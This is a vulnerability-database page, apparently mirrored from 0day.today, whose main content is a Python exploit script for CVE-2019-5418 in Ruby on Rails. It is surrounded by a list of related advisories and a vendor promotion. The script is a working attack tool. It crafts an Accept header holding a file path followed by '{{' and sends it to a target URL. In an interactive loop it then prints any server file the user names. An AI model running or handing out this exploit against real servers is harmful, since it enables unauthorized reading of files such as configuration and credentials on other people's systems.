Lucene search

K

Rails 5.2.1 - Arbitrary File Content Disclosure Exploit

🗓️ 24 Mar 2019 00:00:00Reported by NotoriousRebelType 
zdt
 zdt
🔗 0day.today👁 407 Views

Rails 5.2.1 Arbitrary File Content Disclosur

Show more
Related
Code
ReporterTitlePublishedViews
Family
Check Point Advisories
Rails Action View Information Disclosure (CVE-2019-5418)
29 Jul 202000:00
checkpoint_advisories
Prion
Design/Logic Flaw
27 Mar 201914:29
prion
Metasploit
Ruby On Rails File Content Disclosure ('doubletap')
28 Mar 201901:13
metasploit
GithubExploit
Exploit for Vulnerability in Rubyonrails Rails
19 Nov 201909:40
githubexploit
GithubExploit
Exploit for Vulnerability in Rubyonrails Rails
4 Oct 201919:28
githubexploit
GithubExploit
Exploit for Vulnerability in Rubyonrails Rails
16 Mar 201911:58
githubexploit
GithubExploit
Exploit for Vulnerability in Rubyonrails Rails
23 Mar 201902:52
githubexploit
Debian CVE
CVE-2019-5418
27 Mar 201914:29
debiancve
AttackerKB
Ruby on Rails 5.2 "DoubleTap" Directory Traversal
27 Mar 201900:00
attackerkb
Veracode
Information Disclosure
14 Mar 201902:43
veracode
Rows per page
'''
Exploit Title: File Content Disclosure on Rails
Date: CVE disclosed 3/16 today's date is 3/20
Exploit Author: NotoriousRebel
Vendor Homepage: https://rubyonrails.org/
Software Link: https://github.com/rails/rails
Version: Versions Affected: all Fixed Versions: 6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1
Tested on: Rails 5.2.1 (Using ubuntu on linux subsystem for Windows)
CVE: 2019-5418
'''
import sys

try:
    import requests
except ImportError:
    print('\n\033[93m[!] Requests library not found, please install before proceeding.\n\n \033[0m')
    sys.exit(1)


def banner():
    banner = """
    ----------------------------------------------
    Arbitrary Traversal exploit for Ruby on Rails
    CVE-2019-5418
    ----------------------------------------------
    """
    print(banner)

def check_args():
    if len(sys.argv) != 2:
        print("Invalid number of arguments entered!")
        how_to_use = "python3 Bandit.py url"
        print('Use as:', how_to_use)
        sys.exit(1)


def check_url(url):
    status_code = requests.get(url)
    if status_code != 200:
        print("Url is invalid or can not be reached!")
        sys.exit(1)


def read_file(url, file):
    headers = {'Accept': file + '{{'}
    req = requests.get(url, headers=headers)
    return req


def main():
    banner()
    check_args()
    url = sys.argv[1]
    while True:
        try:
            file = input("Enter file to read (enter quit to exit): ")
        except Exception:
            file = raw_input("Enter file to read (enter quit to exit): ")
        try:
            if file.lower() == 'quit':
                break
        except Exception:
            if file == 'quit':
                break
        response = read_file(url, file)
        print(response.text)


if __name__ == '__main__':
    try:
        main()
    except KeyboardInterrupt:
        print('\n\n\033[93m[!] ctrl+c detected from user, quitting.\n\n \033[0m')

#  0day.today [2019-03-24]  #

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
24 Mar 2019 00:00Current
7.9High risk
Vulners AI Score7.9
EPSS0.974
407
.json
Report